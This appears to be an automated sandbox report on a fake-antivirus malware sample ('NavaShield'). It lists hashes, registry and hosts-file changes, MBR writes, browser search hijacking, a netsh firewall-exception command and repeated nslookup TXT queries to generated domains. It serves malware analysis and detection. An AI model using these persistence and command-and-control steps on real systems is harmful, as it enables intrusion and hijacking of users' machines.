Resubmissions
- 03-07-2024 22:59: 240703-2yn7wszhlp (score 10)
- 03-07-2024 16:13: 240703-tn93lsyglf (score 10)
- 03-07-2024 16:11: 240703-tm84xsyfma (score 10)
- 10-05-2024 16:25: 240510-tw1h5shh47 (score 10)
- 24-08-2023 11:16: 230824-nda8msdf8z (score 10)

Analysis
- Max time kernel: 1806s
- Max time network: 1695s
- Platform: windows10_x64
- Resource: win10v20201028
- Submitted: 22-11-2020 06:42
- Static task: static1
- Behavioral task: behavioral24
- Sample: Endermanch@NavaShield(1).exe
General
- Target: -
- Size: 6.1MB
- MD5: 04155ed507699b4e37532e8371192c0b
- SHA1: a14107131237dbb0df750e74281c462a2ea61016
- SHA256: b6371644b93b9d3b9b32b2f13f8265f9c23ddecc1e9c5a0291bbf98aa0fc3b77
- SHA512: 6de59ebbc9b96c8a19d530caa13aa8129531ebd14b3b6c6bbb758426b59ed5ab12483bfa232d853af2e661021231b4b3fcc6c53e187eeba38fa523f673115371
Malware Config
Signatures
- Checks for common network interception software (1 TTPs)
  Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
- Enumerates VirtualBox registry keys (2 TTPs)
- Blocks application from running via registry modification
  Adds application to list of disallowed applications.
- Drops file in Drivers directory (4 IoCs)
  Process: Endermanch@NavaShield(1).exe
  - File created: C:\Windows\System32\drivers\etc\hosts
  - File opened for modification: C:\Windows\System32\drivers\etc\hosts
  - File opened for modification: C:\Windows\system32\drivers\etc\hosts
  - File created: C:\Windows\system32\drivers\etc\host_new
- Sets file execution options in registry (2 TTPs)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 4 IoCs)
  Process: Endermanch@NavaShield(1).exe
  - Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run
  - Key created: \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
  - Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  - Set value (str): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Internet Security Guard = "\"C:\\ProgramData\\80279\\IS07a.exe\" /s /d"
- Checks for any installed AV software in registry (1 TTPs, 1 IoCs)
  Process: Endermanch@NavaShield(1).exe
  - Key opened: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Eset\Nod\
- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Enumerates connected drives (3 TTPs, 22 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes:
- Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
  Bootkits write to the MBR to gain persistence at a level below the operating system.
  Process: Endermanch@NavaShield(1).exe
  - File opened for modification: \??\PhysicalDrive0
- Modifies Internet Explorer settings
  Process: Endermanch@NavaShield(1).exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\PRS = "http://127.0.0.1:27777/?inj=%ORIGINAL%"
  - Set value (int): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\IIL = "0"
  - Set value (str): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no"
  - Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\BrowserEmulation
  - Set value (int): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "0"
  - Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\SearchScopes
  - Set value (str): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://findgala.com/?&uid=7&q={searchTerms}"
  - Set value (int): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\ltHI = "0"
  - Set value (int): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\ltTST = "28117"
  - Set value (int): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Download\RunInvalidSignatures = "1"
  - Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
- Modifies data under HKEY_USERS (6 IoCs)
  Process: Endermanch@NavaShield(1).exe
  - Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}"
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}"
  - Key created: \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes
  - Set value (str): \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}"
  - Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes
- Modifies registry class (15 IoCs)
  Process: Endermanch@NavaShield(1).exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}"
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\[email protected]
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID
  - Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Software
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\[email protected]\Clsid
  - Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Software\Microsoft
  - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID\ = "[email protected]"
  - Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Software\Microsoft\Internet Explorer\SearchScopes
  - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ = "Implements DocHostUIHandler"
  - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Endermanch@NavaShield(1).exe"
  - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\[email protected]\ = "Implements DocHostUIHandler"
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32
  - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\[email protected]\Clsid\ = "{3F2BBC05-40DF-11D2-9455-00104BC936FF}"
  - Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Software\Microsoft\Internet Explorer
- Suspicious behavior: EnumeratesProcesses (12090 IoCs)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  - Token: SeSecurityPrivilege, PID 2616, mofcomp.exe
  - Token: 33, PID 2996, AUDIODG.EXE
  - Token: SeIncBasePriorityPrivilege, PID 2996, AUDIODG.EXE
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes:
  - PID 676, Endermanch@NavaShield(1).exe
  - PID 676, Endermanch@NavaShield(1).exe
- Suspicious use of SendNotifyMessage (2 IoCs)
  Processes:
  - PID 676, Endermanch@NavaShield(1).exe
  - PID 676, Endermanch@NavaShield(1).exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes:
  - PID 676, Endermanch@NavaShield(1).exe
  - PID 676, Endermanch@NavaShield(1).exe
  - PID 676, Endermanch@NavaShield(1).exe
  - PID 676, Endermanch@NavaShield(1).exe
- Suspicious use of WriteProcessMemory (78 IoCs)
  Processes:
Processes
- C:\Users\Admin\AppData\Local\Temp\Endermanch@NavaShield(1).exe (PID 676): "C:\Users\Admin\AppData\Local\Temp\Endermanch@NavaShield(1).exe"
  Signatures:
  - Drops file in Drivers directory
  - Adds Run key to start application
  - Checks for any installed AV software in registry
  - Enumerates connected drives
  - Writes to the Master Boot Record (MBR)
  - Modifies Internet Explorer settings
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  Child processes:
  - C:\Windows\SysWOW64\Wbem\mofcomp.exe (PID 2616): mofcomp "C:\Users\Admin\AppData\Local\Temp\6214.mof"
    Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\netsh.exe (PID 4088): netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Endermanch@NavaShield(1).exe" "Internet Security Guard" ENABLE
  - C:\Windows\SysWOW64\nslookup.exe (PID 3152): nslookup -q=txt iqqzghpraj1496pv.com 8.8.8.8
  - C:\Windows\SysWOW64\nslookup.exe (PID 1944): nslookup -q=txt iqqzghpraj1496pv.net 8.8.8.8
  - C:\Windows\SysWOW64\nslookup.exe (PID 744): nslookup -q=txt iqqzghpraj1496pv.com 208.67.222.222
  - C:\Windows\SysWOW64\nslookup.exe (PID 640): nslookup -q=txt iqqzghpraj1496pv.net 208.67.222.222
  - C:\Windows\SysWOW64\nslookup.exe (PID 4076): nslookup -q=txt iqqzghpraj1496pv.com 8.8.4.4
  - C:\Windows\SysWOW64\nslookup.exe (PID 3584): nslookup -q=txt iqqzghpraj1496pv.net 8.8.4.4
  - C:\Windows\SysWOW64\nslookup.exe (PID 1184): nslookup -q=txt iqqzghpraj1496pv.com 208.67.220.220
  - C:\Windows\SysWOW64\nslookup.exe (PID 396): nslookup -q=txt iqqzghpraj1496pv.net 208.67.220.220
  - C:\Windows\SysWOW64\nslookup.exe (PID 2732): nslookup -q=txt cklt476chlmrzdj.com 8.8.8.8
  - C:\Windows\SysWOW64\nslookup.exe (PID 1596): nslookup -q=txt cklt476chlmrzdj.net 8.8.8.8
  - C:\Windows\SysWOW64\nslookup.exe (PID 1456): nslookup -q=txt cklt476chlmrzdj.com 208.67.222.222
  - C:\Windows\SysWOW64\nslookup.exe (PID 2152): nslookup -q=txt cklt476chlmrzdj.net 208.67.222.222
  - C:\Windows\SysWOW64\nslookup.exe (PID 184): nslookup -q=txt cklt476chlmrzdj.com 8.8.4.4
  - C:\Windows\SysWOW64\nslookup.exe (PID 748): nslookup -q=txt cklt476chlmrzdj.net 8.8.4.4
  - C:\Windows\SysWOW64\nslookup.exe (PID 3468): nslookup -q=txt cklt476chlmrzdj.com 208.67.220.220
  - C:\Windows\SysWOW64\nslookup.exe (PID 3176): nslookup -q=txt cklt476chlmrzdj.net 208.67.220.220
  - C:\Windows\SysWOW64\nslookup.exe (PID 3412): nslookup -q=txt flnstbd952muudj.com 8.8.8.8
  - C:\Windows\SysWOW64\nslookup.exe (PID 1528): nslookup -q=txt flnstbd952muudj.net 8.8.8.8
  - C:\Windows\SysWOW64\nslookup.exe (PID 3184): nslookup -q=txt flnstbd952muudj.com 208.67.222.222
  - C:\Windows\SysWOW64\nslookup.exe (PID 1304): nslookup -q=txt flnstbd952muudj.net 208.67.222.222
  - C:\Windows\SysWOW64\nslookup.exe (PID 2924): nslookup -q=txt flnstbd952muudj.com 8.8.4.4
  - C:\Windows\SysWOW64\nslookup.exe (PID 1780): nslookup -q=txt flnstbd952muudj.net 8.8.4.4
  - C:\Windows\SysWOW64\nslookup.exe (PID 1428): nslookup -q=txt flnstbd952muudj.com 208.67.220.220
  - C:\Windows\SysWOW64\nslookup.exe (PID 348): nslookup -q=txt flnstbd952muudj.net 208.67.220.220
- C:\Windows\system32\AUDIODG.EXE (PID 2996): C:\Windows\system32\AUDIODG.EXE 0x240
  Signatures: Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- MD5: 3754f8f8abad5bad797085d0717a9766
- SHA1: 48d92f36cb721b390e216aa03b27b41f25c563fc
- SHA256: 3c77f5f888d417a7a31284cb8c5e3bdb4d926c4a274cecac8a8b2920659d5927
- SHA512: c59f322ece53c757767e52fe9bfbc3526a13afe9ec7503e3d1cae683eeb55cbb808a1bce720fd58f97f286756d314124bcf797c2167275e08ed93ba759bf3985